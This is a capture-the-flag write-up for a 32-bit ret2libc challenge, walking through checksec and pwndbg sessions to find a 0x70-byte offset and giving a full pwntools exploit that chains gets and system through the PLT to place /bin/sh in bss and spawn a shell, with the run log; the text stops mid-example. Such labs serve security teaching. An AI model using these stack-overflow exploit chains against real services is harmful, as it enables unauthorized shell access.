1. Challenge information
Challenge download link: https://pan.baidu.com/s/1I9IOqD3Jq6RrghlUNL0wsg  extraction code: 0000
2. Solution analysis
ret2libc means hijacking the program's control flow so that it executes a function from libc, typically by returning to a function's PLT entry or to the function's actual address (the value stored in its GOT entry); in most cases the aim is to run system('/bin/sh').
2.1 First, check which protections the binary was built with
root@pwn_test1604:/ctf/work/wolf/ret2libc# checksec ./ret2libc2
[*] '/ctf/work/wolf/ret2libc/ret2libc2'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x8048000)
root@pwn_test1604:/ctf/work/wolf/ret2libc#
The program is a 32-bit little-endian binary with NX enabled.
2.2 Next, look at the program in IDA
2.3 This challenge is essentially the same as example 1, except that the program no longer contains a /bin/sh string, so we have to write /bin/sh ourselves with gets into a writable, executable region, usually the bss segment; pick an address there in IDA.
2.4 Use gdb to work out how many bytes the string s lies below ebp
root@pwn_test1604:/ctf/work/wolf/ret2libc# gdb ./ret2libc2
GNU gdb (Ubuntu 7.11.1-0ubuntu1~16.5) 7.11.1
Copyright (C) 2016 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law. Type "show copying"
and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
<http://www.gnu.org/software/gdb/documentation/>.
For help, type "help".
Type "apropos word" to search for commands related to "word"...
pwndbg: loaded 171 commands. Type pwndbg [filter] for a list.
pwndbg: created $rebase, $ida gdb functions (can be used with print/break)
Reading symbols from ./ret2libc2...done.
pwndbg> r
Starting program: /ctf/work/wolf/ret2libc/ret2libc2
Something surprise here, but I don't think it will work.
What do you think ?
[Inferior 1 (process 254) exited normally]
pwndbg> b main
Breakpoint 1 at 0x8048651: file ret2libc.c, line 20.
pwndbg> r
Starting program: /ctf/work/wolf/ret2libc/ret2libc2

Breakpoint 1, main () at ret2libc.c:20
20 ret2libc.c: No such file or directory.
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
──────────────────────────────[ REGISTERS ]──────────────────────────────
 EAX  0xf7fc6dbc (environ) —▸ 0xffffd79c —▸ 0xffffd8f1 ◂— 'LESSOPEN=| /usr/bin/lesspipe %s'
 EBX  0x0
 ECX  0x166be5d2
 EDX  0xffffd724 ◂— 0x0
 EDI  0xf7fc5000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x1b1db0
 ESI  0xf7fc5000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x1b1db0
 EBP  0xffffd6f8 ◂— 0x0
 ESP  0xffffd670 —▸ 0xf7ffcd00 (_rtld_global_ro) ◂— 0x0
 EIP  0x8048651 (main+9) ◂— mov eax, dword ptr [0x804a060]
───────────────────────────────[ DISASM ]────────────────────────────────
 ► 0x8048651 <main+9>     mov    eax, dword ptr [0x804a060]
   0x8048656 <main+14>    mov    dword ptr [esp + 0xc], 0
   0x804865e <main+22>    mov    dword ptr [esp + 8], 2
   0x8048666 <main+30>    mov    dword ptr [esp + 4], 0
   0x804866e <main+38>    mov    dword ptr [esp], eax
   0x8048671 <main+41>    call   setvbuf@plt <0x80484d0>
   0x8048676 <main+46>    mov    eax, dword ptr [stdin@@GLIBC_2.0] <0x804a040>
   0x804867b <main+51>    mov    dword ptr [esp + 0xc], 0
   0x8048683 <main+59>    mov    dword ptr [esp + 8], 1
   0x804868b <main+67>    mov    dword ptr [esp + 4], 0
   0x8048693 <main+75>    mov    dword ptr [esp], eax
────────────────────────────────[ STACK ]────────────────────────────────
00:0000│ esp 0xffffd670 —▸ 0xf7ffcd00 (_rtld_global_ro) ◂— 0x0
01:0004│ 0xffffd674 —▸ 0xffffd79c —▸ 0xffffd8f1 ◂— 'LESSOPEN=| /usr/bin/lesspipe %s'
02:0008│ 0xffffd678 ◂— 0xe0
03:000c│ 0xffffd67c ◂— 0x0
04:0010│ 0xffffd680 —▸ 0xf7ffd000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x23f40
05:0014│ 0xffffd684 —▸ 0xf7ffd918 ◂— 0x0
06:0018│ 0xffffd688 —▸ 0xffffd6a0 ◂— 0xffffffff
07:001c│ 0xffffd68c —▸ 0x8048329 ◂— pop edi /* '__libc_start_main' */
──────────────────────────────[ BACKTRACE ]──────────────────────────────
 ► f 0  8048651 main+9
   f 1 f7e2b637 __libc_start_main+247
Breakpoint main
pwndbg> n
21 in ret2libc.c
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
──────────────────────────────[ REGISTERS ]──────────────────────────────
 EAX  0x0
 EBX  0x0
 ECX  0xf7fc6870 (_IO_stdfile_1_lock) ◂— 0x0
 EDX  0x0
 EDI  0xf7fc5000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x1b1db0
 ESI  0xf7fc5000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x1b1db0
 EBP  0xffffd6f8 ◂— 0x0
 ESP  0xffffd670 —▸ 0xf7fc5d60 (_IO_2_1_stdout_) ◂— 0xfbad2087
 EIP  0x8048676 (main+46) ◂— mov eax, dword ptr [0x804a040]
───────────────────────────────[ DISASM ]────────────────────────────────
   0x8048656 <main+14>    mov    dword ptr [esp + 0xc], 0
   0x804865e <main+22>    mov    dword ptr [esp + 8], 2
   0x8048666 <main+30>    mov    dword ptr [esp + 4], 0
   0x804866e <main+38>    mov    dword ptr [esp], eax
   0x8048671 <main+41>    call   setvbuf@plt <0x80484d0>
 ► 0x8048676 <main+46>    mov    eax, dword ptr [stdin@@GLIBC_2.0] <0x804a040>
   0x804867b <main+51>    mov    dword ptr [esp + 0xc], 0
   0x8048683 <main+59>    mov    dword ptr [esp + 8], 1
   0x804868b <main+67>    mov    dword ptr [esp + 4], 0
   0x8048693 <main+75>    mov    dword ptr [esp], eax
   0x8048696 <main+78>    call   setvbuf@plt <0x80484d0>
────────────────────────────────[ STACK ]────────────────────────────────
00:0000│ esp 0xffffd670 —▸ 0xf7fc5d60 (_IO_2_1_stdout_) ◂— 0xfbad2087
01:0004│ 0xffffd674 ◂— 0x0
02:0008│ 0xffffd678 ◂— 0x2
03:000c│ 0xffffd67c ◂— 0x0
04:0010│ 0xffffd680 —▸ 0xf7ffd000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x23f40
05:0014│ 0xffffd684 —▸ 0xf7ffd918 ◂— 0x0
06:0018│ 0xffffd688 —▸ 0xffffd6a0 ◂— 0xffffffff
07:001c│ 0xffffd68c —▸ 0x8048329 ◂— pop edi /* '__libc_start_main' */
──────────────────────────────[ BACKTRACE ]──────────────────────────────
 ► f 0  8048676 main+46
   f 1 f7e2b637 __libc_start_main+247
pwndbg> n
25 in ret2libc.c
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
──────────────────────────────[ REGISTERS ]──────────────────────────────
 EAX  0x0
 EBX  0x0
 ECX  0xf7fc687c (_IO_stdfile_0_lock) ◂— 0x0
 EDX  0x0
 EDI  0xf7fc5000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x1b1db0
 ESI  0xf7fc5000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x1b1db0
 EBP  0xffffd6f8 ◂— 0x0
 ESP  0xffffd670 —▸ 0xf7fc55a0 (_IO_2_1_stdin_) ◂— 0xfbad2288
 EIP  0x804869b (main+83) ◂— mov dword ptr [esp], 0x8048770
───────────────────────────────[ DISASM ]────────────────────────────────
   0x804867b <main+51>    mov    dword ptr [esp + 0xc], 0
   0x8048683 <main+59>    mov    dword ptr [esp + 8], 1
   0x804868b <main+67>    mov    dword ptr [esp + 4], 0
   0x8048693 <main+75>    mov    dword ptr [esp], eax
   0x8048696 <main+78>    call   setvbuf@plt <0x80484d0>
 ► 0x804869b <main+83>    mov    dword ptr [esp], 0x8048770
   0x80486a2 <main+90>    call   puts@plt <0x8048480>
   0x80486a7 <main+95>    mov    dword ptr [esp], 0x80487a9
   0x80486ae <main+102>   call   printf@plt <0x8048450>
   0x80486b3 <main+107>   lea    eax, [esp + 0x1c]
   0x80486b7 <main+111>   mov    dword ptr [esp], eax
────────────────────────────────[ STACK ]────────────────────────────────
00:0000│ esp 0xffffd670 —▸ 0xf7fc55a0 (_IO_2_1_stdin_) ◂— 0xfbad2288
01:0004│ 0xffffd674 ◂— 0x0
02:0008│ 0xffffd678 ◂— 0x1
03:000c│ 0xffffd67c ◂— 0x0
04:0010│ 0xffffd680 —▸ 0xf7ffd000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x23f40
05:0014│ 0xffffd684 —▸ 0xf7ffd918 ◂— 0x0
06:0018│ 0xffffd688 —▸ 0xffffd6a0 ◂— 0xffffffff
07:001c│ 0xffffd68c —▸ 0x8048329 ◂— pop edi /* '__libc_start_main' */
──────────────────────────────[ BACKTRACE ]──────────────────────────────
 ► f 0  804869b main+83
   f 1 f7e2b637 __libc_start_main+247
pwndbg> n
Something surprise here, but I don't think it will work.
26 in ret2libc.c
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
──────────────────────────────[ REGISTERS ]──────────────────────────────
 EAX  0x39
 EBX  0x0
 ECX  0xffffffff
 EDX  0xf7fc6870 (_IO_stdfile_1_lock) ◂— 0x0
 EDI  0xf7fc5000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x1b1db0
 ESI  0xf7fc5000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x1b1db0
 EBP  0xffffd6f8 ◂— 0x0
 ESP  0xffffd670 —▸ 0x8048770 ◂— push ebx /* "Something surprise here, but I don't think it will work." */
 EIP  0x80486a7 (main+95) ◂— mov dword ptr [esp], 0x80487a9
───────────────────────────────[ DISASM ]────────────────────────────────
   0x804868b <main+67>    mov    dword ptr [esp + 4], 0
   0x8048693 <main+75>    mov    dword ptr [esp], eax
   0x8048696 <main+78>    call   setvbuf@plt <0x80484d0>
   0x804869b <main+83>    mov    dword ptr [esp], 0x8048770
   0x80486a2 <main+90>    call   puts@plt <0x8048480>
 ► 0x80486a7 <main+95>    mov    dword ptr [esp], 0x80487a9
   0x80486ae <main+102>   call   printf@plt <0x8048450>
   0x80486b3 <main+107>   lea    eax, [esp + 0x1c]
   0x80486b7 <main+111>   mov    dword ptr [esp], eax
   0x80486ba <main+114>   call   gets@plt <0x8048460>
   0x80486bf <main+119>   mov    eax, 0
────────────────────────────────[ STACK ]────────────────────────────────
00:0000│ esp 0xffffd670 —▸ 0x8048770 ◂— push ebx /* "Something surprise here, but I don't think it will work." */
01:0004│ 0xffffd674 ◂— 0x0
02:0008│ 0xffffd678 ◂— 0x1
03:000c│ 0xffffd67c ◂— 0x0
04:0010│ 0xffffd680 —▸ 0xf7ffd000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x23f40
05:0014│ 0xffffd684 —▸ 0xf7ffd918 ◂— 0x0
06:0018│ 0xffffd688 —▸ 0xffffd6a0 ◂— 0xffffffff
07:001c│ 0xffffd68c —▸ 0x8048329 ◂— pop edi /* '__libc_start_main' */
──────────────────────────────[ BACKTRACE ]──────────────────────────────
 ► f 0  80486a7 main+95
   f 1 f7e2b637 __libc_start_main+247
pwndbg> n
What do you think ?
27 in ret2libc.c
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
──────────────────────────────[ REGISTERS ]──────────────────────────────
 EAX  0x13
 EBX  0x0
 ECX  0xffffffff
 EDX  0xf7fc6870 (_IO_stdfile_1_lock) ◂— 0x0
 EDI  0xf7fc5000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x1b1db0
 ESI  0xf7fc5000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x1b1db0
 EBP  0xffffd6f8 ◂— 0x0
 ESP  0xffffd670 —▸ 0x80487a9 ◂— push edi /* 'What do you think ?' */
 EIP  0x80486b3 (main+107) ◂— lea eax, [esp + 0x1c]
───────────────────────────────[ DISASM ]────────────────────────────────
   0x8048696 <main+78>    call   setvbuf@plt <0x80484d0>
   0x804869b <main+83>    mov    dword ptr [esp], 0x8048770
   0x80486a2 <main+90>    call   puts@plt <0x8048480>
   0x80486a7 <main+95>    mov    dword ptr [esp], 0x80487a9
   0x80486ae <main+102>   call   printf@plt <0x8048450>
 ► 0x80486b3 <main+107>   lea    eax, [esp + 0x1c]
   0x80486b7 <main+111>   mov    dword ptr [esp], eax
   0x80486ba <main+114>   call   gets@plt <0x8048460>
   0x80486bf <main+119>   mov    eax, 0
   0x80486c4 <main+124>   leave
   0x80486c5 <main+125>   ret
────────────────────────────────[ STACK ]────────────────────────────────
00:0000│ esp 0xffffd670 —▸ 0x80487a9 ◂— push edi /* 'What do you think ?' */
01:0004│ 0xffffd674 ◂— 0x0
02:0008│ 0xffffd678 ◂— 0x1
03:000c│ 0xffffd67c ◂— 0x0
04:0010│ 0xffffd680 —▸ 0xf7ffd000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x23f40
05:0014│ 0xffffd684 —▸ 0xf7ffd918 ◂— 0x0
06:0018│ 0xffffd688 —▸ 0xffffd6a0 ◂— 0xffffffff
07:001c│ 0xffffd68c —▸ 0x8048329 ◂— pop edi /* '__libc_start_main' */
──────────────────────────────[ BACKTRACE ]──────────────────────────────
 ► f 0  80486b3 main+107
   f 1 f7e2b637 __libc_start_main+247
pwndbg> n
AAAA
29 in ret2libc.c
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
──────────────────────────────[ REGISTERS ]──────────────────────────────
 EAX  0xffffd68c ◂— 'AAAA'
 EBX  0x0
 ECX  0xf7fc55a0 (_IO_2_1_stdin_) ◂— 0xfbad2288
 EDX  0xf7fc687c (_IO_stdfile_0_lock) ◂— 0x0
 EDI  0xf7fc5000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x1b1db0
 ESI  0xf7fc5000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x1b1db0
 EBP  0xffffd6f8 ◂— 0x0
 ESP  0xffffd670 —▸ 0xffffd68c ◂— 'AAAA'
 EIP  0x80486bf (main+119) ◂— mov eax, 0
───────────────────────────────[ DISASM ]────────────────────────────────
   0x80486a7 <main+95>    mov    dword ptr [esp], 0x80487a9
   0x80486ae <main+102>   call   printf@plt <0x8048450>
   0x80486b3 <main+107>   lea    eax, [esp + 0x1c]
   0x80486b7 <main+111>   mov    dword ptr [esp], eax
   0x80486ba <main+114>   call   gets@plt <0x8048460>
 ► 0x80486bf <main+119>   mov    eax, 0
   0x80486c4 <main+124>   leave
   0x80486c5 <main+125>   ret
    ↓
   0xf7e2b637 <__libc_start_main+247>    add    esp, 0x10
   0xf7e2b63a <__libc_start_main+250>    sub    esp, 0xc
   0xf7e2b63d <__libc_start_main+253>    push   eax
────────────────────────────────[ STACK ]────────────────────────────────
00:0000│ esp 0xffffd670 —▸ 0xffffd68c ◂— 'AAAA'
01:0004│ 0xffffd674 ◂— 0x0
02:0008│ 0xffffd678 ◂— 0x1
03:000c│ 0xffffd67c ◂— 0x0
04:0010│ 0xffffd680 —▸ 0xf7ffd000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x23f40
05:0014│ 0xffffd684 —▸ 0xf7ffd918 ◂— 0x0
06:0018│ 0xffffd688 —▸ 0xffffd6a0 ◂— 0xffffffff
07:001c│ eax 0xffffd68c ◂— 'AAAA'
──────────────────────────────[ BACKTRACE ]──────────────────────────────
 ► f 0  80486bf main+119
   f 1 f7e2b637 __libc_start_main+247
pwndbg> stack 35
00:0000│ esp 0xffffd670 —▸ 0xffffd68c ◂— 'AAAA'
01:0004│ 0xffffd674 ◂— 0x0
02:0008│ 0xffffd678 ◂— 0x1
03:000c│ 0xffffd67c ◂— 0x0
04:0010│ 0xffffd680 —▸ 0xf7ffd000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x23f40
05:0014│ 0xffffd684 —▸ 0xf7ffd918 ◂— 0x0
06:0018│ 0xffffd688 —▸ 0xffffd6a0 ◂— 0xffffffff
07:001c│ eax 0xffffd68c ◂— 'AAAA'
08:0020│ 0xffffd690 ◂— 0x0
09:0024│ 0xffffd694 —▸ 0xffffd734 ◂— 0x2cae0bc2
0a:0028│ 0xffffd698 —▸ 0xf7fc5000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x1b1db0
0b:002c│ 0xffffd69c —▸ 0xf7ef9f17 (__init_misc+39) ◂— add esp, 0x10
0c:0030│ 0xffffd6a0 ◂— 0xffffffff
0d:0034│ 0xffffd6a4 ◂— 0x2f /* '/' */
0e:0038│ 0xffffd6a8 —▸ 0xf7e1fdc8 ◂— jbe 0xf7e1fdf5 /* 'v+' */
0f:003c│ 0xffffd6ac —▸ 0xf7fd21b0 —▸ 0xf7e13000 ◂— jg 0xf7e13047
10:0040│ 0xffffd6b0 ◂— 0x1
11:0044│ 0xffffd6b4 ◂— 0x8000
12:0048│ 0xffffd6b8 —▸ 0xf7fc5000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x1b1db0
13:004c│ 0xffffd6bc —▸ 0x8048425 (_init+9) ◂— add ebx, 0x1bdb
14:0050│ 0xffffd6c0 ◂— 0x1
15:0054│ 0xffffd6c4 ◂— 0x2000000
16:0058│ 0xffffd6c8 —▸ 0x804a000 (_GLOBAL_OFFSET_TABLE_) —▸ 0x8049f14 (_DYNAMIC) ◂— 0x1
17:005c│ 0xffffd6cc —▸ 0x8048722 (__libc_csu_init+82) ◂— add edi, 1
18:0060│ 0xffffd6d0 ◂— 0x1
19:0064│ 0xffffd6d4 —▸ 0xffffd794 —▸ 0xffffd8cf ◂— '/ctf/work/wolf/ret2libc/ret2libc2'
1a:0068│ 0xffffd6d8 —▸ 0xffffd79c —▸ 0xffffd8f1 ◂— 'LESSOPEN=| /usr/bin/lesspipe %s'
1b:006c│ 0xffffd6dc —▸ 0xf7e41c0b (__cxa_atexit+27) ◂— add esp, 0x10
1c:0070│ 0xffffd6e0 —▸ 0xf7fc53dc (__exit_funcs) —▸ 0xf7fc61e0 (initial) ◂— 0x0
1d:0074│ 0xffffd6e4 —▸ 0x8048258 ◂— popal /* 'a' */
1e:0078│ 0xffffd6e8 —▸ 0x80486db (__libc_csu_init+11) ◂— add ebx, 0x1925
1f:007c│ 0xffffd6ec ◂— 0x0
20:0080│ 0xffffd6f0 —▸ 0xf7fc5000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x1b1db0
... ↓
22:0088│ ebp 0xffffd6f8 ◂— 0x0
2.5 Adding the 4 bytes of the saved ebp, a total of 0x70 bytes of padding is needed to reach the return address
Python 2.7.18 (default, Aug 1 2022, 06:23:55)
[GCC 12.1.0] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> 0xd6f8-0xd68c
108
>>> 108/16
6
>>> 112/16
7
>>>
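The offset computation in 2.4 and 2.5 can be done straight from the pwndbg output instead of by hand. This is an added example, not part of the original writeup: it parses the `stack` rows shown above (STACK_DUMP is a constructed excerpt of them), locates the slot that holds the 'AAAA' typed into gets and the slot pwndbg labels `ebp`, and returns the distance to the saved ebp and to the return address.

```python
import re

# Constructed excerpt of the pwndbg "stack 35" output shown above; rows that
# play no part in the computation are left out. "... ↓" is pwndbg's marker
# for repeated values and is skipped by the parser.
STACK_DUMP = """\
00:0000│ esp 0xffffd670 —▸ 0xffffd68c ◂— 'AAAA'
01:0004│     0xffffd674 ◂— 0x0
06:0018│     0xffffd688 —▸ 0xffffd6a0 ◂— 0xffffffff
07:001c│ eax 0xffffd68c ◂— 'AAAA'
08:0020│     0xffffd690 ◂— 0x0
20:0080│     0xffffd6f0 —▸ 0xf7fc5000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x1b1db0
... ↓
22:0088│ ebp 0xffffd6f8 ◂— 0x0
"""

# One stack row: "<idx>:<off>│ [register] <address> <annotation>"
ROW_RE = re.compile(
    r"^[0-9a-f]{2}:[0-9a-f]{4}│\s*(?:(e[a-z]{2})\s+)?(0x[0-9a-f]+)\s*(.*)$")


def parse_stack(dump):
    """Return [(address, register_label_or_None, annotation)] for every row."""
    rows = []
    for line in dump.splitlines():
        m = ROW_RE.match(line)
        if m:
            reg, addr, note = m.groups()
            rows.append((int(addr, 16), reg, note))
    return rows


def find_buffer(rows, marker):
    """Address of the slot whose own contents are the marker gets() wrote.

    Rows whose annotation starts with '—▸' merely point at the buffer (esp here
    holds the pointer that was passed to gets), so they are skipped."""
    for addr, _, note in rows:
        if note.startswith("◂—") and marker in note:
            return addr
    raise ValueError("marker %r not found in stack dump" % marker)


def find_register(rows, name):
    """Address of the row pwndbg labelled with the given register."""
    for addr, reg, _ in rows:
        if reg == name:
            return addr
    raise ValueError("no row labelled %s" % name)


def padding_to_return_address(dump, marker="AAAA"):
    """(buffer address, ebp, bytes to saved ebp, bytes to return address)."""
    rows = parse_stack(dump)
    buf = find_buffer(rows, marker)
    ebp = find_register(rows, "ebp")
    to_ebp = ebp - buf       # bytes from the start of s to the saved-ebp slot
    to_ret = to_ebp + 4      # the saved ebp is one 4-byte dword on i386
    return buf, ebp, to_ebp, to_ret


if __name__ == "__main__":
    buf, ebp, to_ebp, to_ret = padding_to_return_address(STACK_DUMP)
    print("s=%#x ebp=%#x s->ebp=%d s->ret=%d (%#x)"
          % (buf, ebp, to_ebp, to_ret, to_ret))
```

For the session above this gives 108 bytes to the saved ebp and 112 (0x70) to the return address, matching the Python REPL arithmetic.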
3. Exploit
3.1 Full source
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from pwn import *
import sys

context.terminal = ["tmux", "sp", "-h"]
context.log_level = 'debug'
#context.arch = 'i386'

DEBUG = 1
LOCAL = True
BIN = './ret2libc2'
HOST = 'pwn2.jarvisoj.com'
PORT = 9877
#HOST = 'node5.buuoj.cn'
#PORT = 29787


def get_base_address(proc):
    # First mapping in /proc/<pid>/maps is the load base of the binary
    return int(open("/proc/{}/maps".format(proc.pid), 'rb').readlines()[0].split('-')[0], 16)


def debug(bps, _s):
    # Attach gdb to the running process; bps are offsets relative to the load base
    script = "handle SIGALRM ignore\n"
    PIE = get_base_address(p)
    script += "set $_base = 0x{:x}\n".format(PIE)
    for bp in bps:
        script += "b *0x%x\n" % (PIE + bp)
    script += _s
    gdb.attach(p, gdbscript=script)


# pwn,caidan,leak,libc
# recv recvuntil send sendline sendlineafter sendafter
#aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaab
#shellcode = asm(shellcraft.sh())


def exploit(p):
    elf = ELF('./ret2libc2')
    sys_addr = elf.plt['system']
    gets_addr = elf.plt['gets']
    bss_addr = 0x0804A080
    # 0x70 bytes reach the saved return address (section 2.5). The chain is
    # gets(bss_addr) followed by system(bss_addr): the first bss_addr is the
    # argument of gets (and the junk return address of system), the second is
    # the argument of system.
    payload = cyclic(0x70) + p32(gets_addr) + p32(sys_addr) + p32(bss_addr) + p32(bss_addr)
    p.recv()
    p.sendline(payload)
    p.sendline('/bin/sh')     # read by the gets call into bss_addr
    p.interactive()
    return


if __name__ == "__main__":
    elf = ELF(BIN)
    if len(sys.argv) > 1:
        LOCAL = False
        p = remote(HOST, PORT)
        exploit(p)
    else:
        LOCAL = True
        p = process(BIN)
        log.info('PID: ' + str(proc.pidof(p)[0]))
        # pause
        if DEBUG:
            debug([], "")
        exploit(p)
3.2 Only these parts need to be changed
DEBUG = 1
LOCAL = True
BIN = './ret2libc2'

def exploit(p):
    elf = ELF('./ret2libc2')
    sys_addr = elf.plt['system']
    gets_addr = elf.plt['gets']
    bss_addr = 0x0804A080
    payload = cyclic(0x70) + p32(gets_addr) + p32(sys_addr) + p32(bss_addr) + p32(bss_addr)
    p.recv()
    p.sendline(payload)
    p.sendline('/bin/sh')
    p.interactive()
    return
3.3 Running it
root@pwn_test1604:/ctf/work/wolf/ret2libc# python ret2libc2-1.py
[DEBUG] PLT 0x8048450 printf
[DEBUG] PLT 0x8048450 printf
[DEBUG] PLT 0x8048460 gets
[DEBUG] PLT 0x8048470 time
[DEBUG] PLT 0x8048480 puts
[DEBUG] PLT 0x8048490 system
[DEBUG] PLT 0x80484a0 __gmon_start__
[DEBUG] PLT 0x80484b0 srand
[DEBUG] PLT 0x80484c0 __libc_start_main
[DEBUG] PLT 0x80484d0 setvbuf
[DEBUG] PLT 0x80484e0 rand
[DEBUG] PLT 0x80484f0 __isoc99_scanf
[*] '/ctf/work/wolf/ret2libc/ret2libc2'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x8048000)
[+] Starting local process './ret2libc2': pid 295
[*] PID: 295
[DEBUG] Wrote gdb script to '/tmp/pwnKNJz0a.gdb'
    file ./ret2libc2
    handle SIGALRM ignore
    set $_base = 0x8048000
[*] running in new terminal: /usr/bin/gdb -q "./ret2libc2" 295 -x "/tmp/pwnKNJz0a.gdb"
[DEBUG] Launching a new terminal: ['/usr/bin/tmux', 'sp', '-h', '/usr/bin/gdb -q "./ret2libc2" 295 -x "/tmp/pwnKNJz0a.gdb"']
[+] Waiting for debugger: Done
[DEBUG] PLT 0x8048450 printf
[DEBUG] PLT 0x8048460 gets
[DEBUG] PLT 0x8048470 time
[DEBUG] PLT 0x8048480 puts
[DEBUG] PLT 0x8048490 system
[DEBUG] PLT 0x80484a0 __gmon_start__
[DEBUG] PLT 0x80484b0 srand
[DEBUG] PLT 0x80484c0 __libc_start_main
[DEBUG] PLT 0x80484d0 setvbuf
[DEBUG] PLT 0x80484e0 rand
[DEBUG] PLT 0x80484f0 __isoc99_scanf
[DEBUG] Received 0x4c bytes:
    "Something surprise here, but I don't think it will work.\n"
    'What do you think ?'
[DEBUG] Sent 0x81 bytes:
    00000000  61 61 61 61 62 61 61 61 63 61 61 61 64 61 61 61  │aaaa│baaa│caaa│daaa│
    00000010  65 61 61 61 66 61 61 61 67 61 61 61 68 61 61 61  │eaaa│faaa│gaaa│haaa│
    00000020  69 61 61 61 6a 61 61 61 6b 61 61 61 6c 61 61 61  │iaaa│jaaa│kaaa│laaa│
    00000030  6d 61 61 61 6e 61 61 61 6f 61 61 61 70 61 61 61  │maaa│naaa│oaaa│paaa│
    00000040  71 61 61 61 72 61 61 61 73 61 61 61 74 61 61 61  │qaaa│raaa│saaa│taaa│
    00000050  75 61 61 61 76 61 61 61 77 61 61 61 78 61 61 61  │uaaa│vaaa│waaa│xaaa│
    00000060  79 61 61 61 7a 61 61 62 62 61 61 62 63 61 61 62  │yaaa│zaab│baab│caab│
    00000070  60 84 04 08 90 84 04 08 80 a0 04 08 80 a0 04 08  │`···│····│····│····│
    00000080  0a                                               │·│
    00000081
[DEBUG] Sent 0x8 bytes:
    '/bin/sh\n'
[*] Switching to interactive mode
$ id
[DEBUG] Sent 0x3 bytes:

The pwndbg pane that tmux opened next to the script (the process was attached while blocked inside gets, waiting for input):
───────────────────────────────[ DISASM ]────────────────────────────────
 ► 0xf7fb2589 <__kernel_vsyscall+9>     pop    ebp
   0xf7fb258a <__kernel_vsyscall+10>    pop    edx
   0xf7fb258b <__kernel_vsyscall+11>    pop    ecx
   0xf7fb258c <__kernel_vsyscall+12>    ret
    ↓
   0xf7ec3b23 <__read_nocancel+25>      pop    ebx
   0xf7ec3b24 <__read_nocancel+26>      cmp    eax, 0xfffff001
   0xf7ec3b29 <__read_nocancel+31>      jae    __syscall_error <0xf7e06730>
    ↓
   0xf7e06730 <__syscall_error>         call   __x86.get_pc_thunk.dx <0xf7f0db5d>
   0xf7e06735 <__syscall_error+5>       add    edx, 0x1998cb
   0xf7e0673b <__syscall_error+11>      mov    ecx, dword ptr gs:[0]
   0xf7e06742 <__syscall_error+18>      neg    eax
────────────────────────────────[ STACK ]────────────────────────────────
00:0000│ esp 0xffcdb088 —▸ 0xffcdb0d8 —▸ 0xffcdb158 —▸ 0xffcdb1e8 ◂— 0x0
01:0004│     0xffcdb08c ◂— 0x1000
02:0008│     0xffcdb090 —▸ 0x862d008 ◂— 0x0
03:000c│     0xffcdb094 —▸ 0xf7ec3b23 (__read_nocancel+25) ◂— pop ebx
04:0010│     0xffcdb098 —▸ 0xf7fa0000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x1b1db0
05:0014│     0xffcdb09c —▸ 0xf7e58267 (_IO_file_underflow+295) ◂— add esp, 0x10
06:0018│     0xffcdb0a0 ◂— 0x0
07:001c│     0xffcdb0a4 —▸ 0x862d008 ◂— 0x0
──────────────────────────────[ BACKTRACE ]──────────────────────────────
 ► f 0 f7fb2589 __kernel_vsyscall+9
   f 1 f7ec3b23 __read_nocancel+25
   f 2 f7e58267 _IO_file_underflow+295
   f 3 f7e59237 _IO_default_uflow+23
   f 4 f7e5902c __uflow+140
   f 5 f7e4d529 gets+329
   f 6  80486bf main+119
   f 7 f7e06637 __libc_start_main+247
pwndbg> c
Continuing.
[New process 309]
process 309 is executing new program: /bin/dash
[New process 310]
process 310 is executing new program: /bin/dash
[New process 311]
process 311 is executing new program: /usr/bin/id
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
[Inferior 4 (process 311) exited normally]
pwndbg> i
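The debug log above already contains everything needed to check what was actually sent against the intended gets → system chain. This added example (not the writeup's own code) parses the `[DEBUG] PLT` lines and the hexdump of the sent bytes and labels each dword after the 0x70 bytes of padding; PLT_LOG and SENT_HEXDUMP are constructed from the log above, PADDING and BSS_ADDR are the values used in the exploit.

```python
import re
import struct

# Constructed from the pwntools debug log above: the PLT table ELF() prints
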